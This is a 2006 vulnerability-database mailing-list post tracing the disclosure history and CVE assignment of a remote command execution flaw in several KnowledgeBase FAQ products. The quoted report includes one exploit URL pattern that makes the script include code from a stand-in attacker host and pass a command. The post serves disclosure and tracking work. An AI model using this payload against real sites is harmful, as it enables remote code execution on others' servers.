[VIM] Knowledgebases Remote Command Exucetion
Stuart Moore
smoore at securityglobal.net
Wed Mar 1 01:00:07 EST 2006
Hi,
Francisco Alisson's report to Bugtraq from March 2005 seems to
specifically mention only the KnowledgeBuilder product (though it was
identified as "KnowledgeBase") with the vendor URL of:
http://www.activecampaign.com/kb/
In searching back further, it seems that Zero X reported this issue
[CVE-2003-1131] to Bugtraq in December 2003:
http://www.securityfocus.com/archive/1/348359
But, Zero X's report mentions only KnowledgeBuilder and not any of the
other products.
Would this warrant a new CVE for the newly identified products? Or a
modification to the CVE-2003-1131 entry?
Stuart
security curmudgeon wrote:
> : http://www.activecampaign.com/support/
> :
> : Version : 1-2-All KB
> : * KnowledgeBuilder KB
> : * iSalient KB
> : * SupportTrio KB
> : * visualEdit KB
> : * General KB
> :
> : This is a support-faq script. The questions is asked. But this a script
> : high the risk at bug. Malicios person to reach far away.
> :
> : Vulnerable :
> :
> : http://www.site.com/[path]/index.php?page=http://evilcode?&cmd=
>
> This was reported on Mar 12, 2005 by Francisco Alisson, and apparently not
> patched since then.
>
> http://archives.neohapsis.com/archives/bugtraq/2005-03/0213.html
>
More information about the VIM
mailing list